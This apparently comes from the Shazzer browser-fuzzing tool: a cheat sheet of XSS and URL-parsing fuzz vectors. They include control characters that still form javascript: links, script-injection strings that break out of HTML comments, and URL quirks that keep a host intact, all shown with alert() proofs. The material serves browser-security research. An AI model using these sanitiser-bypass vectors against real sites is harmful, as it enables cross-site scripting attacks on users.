Cheat Sheet
Generated payloads from fuzz test results. Filter by type, category, or browser.
Found 177 vectors with results
<a href="java0x09script:test.com/" id="test"></a>Characters that can be inside the javascript protocol in html
<a href="java
script:test.com/" id="test"></a><a href="java0x0Dscript:test.com/" id="test"></a>Characters that can be inside the javascript protocol in html
<a href="0x01javascript:test.com/" id="test"></a>Characters that can precede the javascript protocol in html
<a href="0x02javascript:test.com/" id="test"></a>Characters that can precede the javascript protocol in html
<a href="0x03javascript:test.com/" id="test"></a>Characters that can precede the javascript protocol in html
<a href="0x04javascript:test.com/" id="test"></a>Characters that can precede the javascript protocol in html
<a href="0x05javascript:test.com/" id="test"></a>Characters that can precede the javascript protocol in html
JavaScript allows you to conditionally call a function using optional chaining.
JavaScript allows you to conditionally call a function using optional chaining.
JavaScript allows you to conditionally call a function using optional chaining.
JavaScript allows you to conditionally call a function using optional chaining.
JavaScript allows you to conditionally call a function using optional chaining.
This vector shows what characters are allowed after the void operator: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/void
This vector shows what characters are allowed after the void operator: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/void
This vector shows what characters are allowed after the void operator: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/void
This vector shows what characters are allowed after the void operator: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/void
This vector shows what characters are allowed after the void operator: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/void
JavaScript allows you to conditionally call a function using optional chaining.
JavaScript allows you to conditionally call a function using optional chaining.
JavaScript allows you to conditionally call a function using optional chaining.
JavaScript allows you to conditionally call a function using optional chaining.
JavaScript allows you to conditionally call a function using optional chaining.
<style>0x0D
0x09div{color:red;}⟦0D⟧
</style>0x0D
<div id=x>test</div>0x0D
This shows how to use Shazzer to fuzz CSS syntax. This vector uses an inline style and div to set the colour. JavaScript is executed directly after each fuzz to check getComputedStyle to see if the div is red.
<style>0x0D
div{color:red;}⟦0D⟧
</style>0x0D
<div id=x>test</div>0x0D
This shows how to use Shazzer to fuzz CSS syntax. This vector uses an inline style and div to set the colour. JavaScript is executed directly after each fuzz to check getComputedStyle to see if the div is red.
<style>0x0D
0x0Cdiv{color:red;}⟦0D⟧
</style>0x0D
<div id=x>test</div>0x0D
This shows how to use Shazzer to fuzz CSS syntax. This vector uses an inline style and div to set the colour. JavaScript is executed directly after each fuzz to check getComputedStyle to see if the div is red.
<style>0x0D
0x0Ddiv{color:red;}⟦0D⟧
</style>0x0D
<div id=x>test</div>0x0D
This shows how to use Shazzer to fuzz CSS syntax. This vector uses an inline style and div to set the colour. JavaScript is executed directly after each fuzz to check getComputedStyle to see if the div is red.
<style>0x0D
div{color:red;}⟦0D⟧
</style>0x0D
<div id=x>test</div>0x0D
This shows how to use Shazzer to fuzz CSS syntax. This vector uses an inline style and div to set the colour. JavaScript is executed directly after each fuzz to check getComputedStyle to see if the div is red.
var myVar = "foo"0x0D
alert(34)0x0D
// a";0x0D
Characters allowed to end a Javascript string followed by a new line.
alert(new URL("http0x00javascript:alert()").protocol)Vector to check if any character can be used to ignore https scheme in URL
<a href="0x01javascript:" id=x></a>This is an example how you can use the XSS type to fuzz URLs. This one fuzzes characters before the JavaScript protocol. It uses a base tag to get round the sandboxed iframe problems.
<a href="0x02javascript:" id=x></a>This is an example how you can use the XSS type to fuzz URLs. This one fuzzes characters before the JavaScript protocol. It uses a base tag to get round the sandboxed iframe problems.
<a href="0x03javascript:" id=x></a>This is an example how you can use the XSS type to fuzz URLs. This one fuzzes characters before the JavaScript protocol. It uses a base tag to get round the sandboxed iframe problems.
<a href="0x04javascript:" id=x></a>This is an example how you can use the XSS type to fuzz URLs. This one fuzzes characters before the JavaScript protocol. It uses a base tag to get round the sandboxed iframe problems.
<a href="0x05javascript:" id=x></a>This is an example how you can use the XSS type to fuzz URLs. This one fuzzes characters before the JavaScript protocol. It uses a base tag to get round the sandboxed iframe problems.
if (new URL("javascript"+String.fromCodePoint(parseInt(9..toString(16),16))+":alert()").protocol=="javascript:"){alert(9)}Vector to check if any characters are allowed between javascript and : to still result in a javascript url.
if (new URL("javascript"+String.fromCodePoint(parseInt(10..toString(16),16))+":alert()").protocol=="javascript:"){alert(10)}Vector to check if any characters are allowed between javascript and : to still result in a javascript url.
if (new URL("javascript"+String.fromCodePoint(parseInt(13..toString(16),16))+":alert()").protocol=="javascript:"){alert(13)}Vector to check if any characters are allowed between javascript and : to still result in a javascript url.
if (new URL("javascript"+String.fromCodePoint(parseInt(58..toString(16),16))+":alert()").protocol=="javascript:"){alert(58)}Vector to check if any characters are allowed between javascript and : to still result in a javascript url.
let chr = String.fromCodePoint(9);0x0D
new URL("foo"+chr+"bar://example.com").host === "example.com" && alert(9)This vector demonstrates which characters are allowed in the protocol section of the URL but still resolve to example.com. Based on the following tweet: https://x.com/0xMstar/status/1918577367062331826
let chr = String.fromCodePoint(10);0x0D
new URL("foo"+chr+"bar://example.com").host === "example.com" && alert(10)This vector demonstrates which characters are allowed in the protocol section of the URL but still resolve to example.com. Based on the following tweet: https://x.com/0xMstar/status/1918577367062331826
let chr = String.fromCodePoint(13);0x0D
new URL("foo"+chr+"bar://example.com").host === "example.com" && alert(13)This vector demonstrates which characters are allowed in the protocol section of the URL but still resolve to example.com. Based on the following tweet: https://x.com/0xMstar/status/1918577367062331826
let chr = String.fromCodePoint(43);0x0D
new URL("foo"+chr+"bar://example.com").host === "example.com" && alert(43)This vector demonstrates which characters are allowed in the protocol section of the URL but still resolve to example.com. Based on the following tweet: https://x.com/0xMstar/status/1918577367062331826
let chr = String.fromCodePoint(45);0x0D
new URL("foo"+chr+"bar://example.com").host === "example.com" && alert(45)This vector demonstrates which characters are allowed in the protocol section of the URL but still resolve to example.com. Based on the following tweet: https://x.com/0xMstar/status/1918577367062331826
<a href="0x01javascript:test.com/" id="test"></a>Characters that can precede the javascript protocol in html
<a href="0x02javascript:test.com/" id="test"></a>Characters that can precede the javascript protocol in html
<a href="0x03javascript:test.com/" id="test"></a>Characters that can precede the javascript protocol in html
<a href="0x04javascript:test.com/" id="test"></a>Characters that can precede the javascript protocol in html
<a href="0x05javascript:test.com/" id="test"></a>Characters that can precede the javascript protocol in html
--><!---><script>alert(45)</script>--><!-->><script>alert(62)</script>This vector shows Unicode characters that have a decomposition of 2 or more ASCII characters, which get normalized by the browser. These characters are valid for use as domain names, expanding short strings into longer ones through decomposition.
if (new URL("https://google.com0x090x09/endpoint").host=="google.com"){alert(9)}Characters ignored in URL, which yield in the same host property. This is just a simple modification of another fuzzing vector by hansmachine
if (new URL("https://google.com##/endpoint").host=="google.com"){alert(35)}Characters ignored in URL, which yield in the same host property. This is just a simple modification of another fuzzing vector by hansmachine
if (new URL("https://google.com///endpoint").host=="google.com"){alert(47)}Characters ignored in URL, which yield in the same host property. This is just a simple modification of another fuzzing vector by hansmachine
if (new URL("https://google.com??/endpoint").host=="google.com"){alert(63)}Characters ignored in URL, which yield in the same host property. This is just a simple modification of another fuzzing vector by hansmachine
if (new URL("https://google.com\\/endpoint").host=="google.com"){alert(92)}Characters ignored in URL, which yield in the same host property. This is just a simple modification of another fuzzing vector by hansmachine
Characters that can be after the opening angle bracket and still form a valid HTML element
Characters that can be used to end unencapsulated HTML attribute values.
Characters that can be used to end unencapsulated HTML attribute values.
Characters that can be used to end unencapsulated HTML attribute values.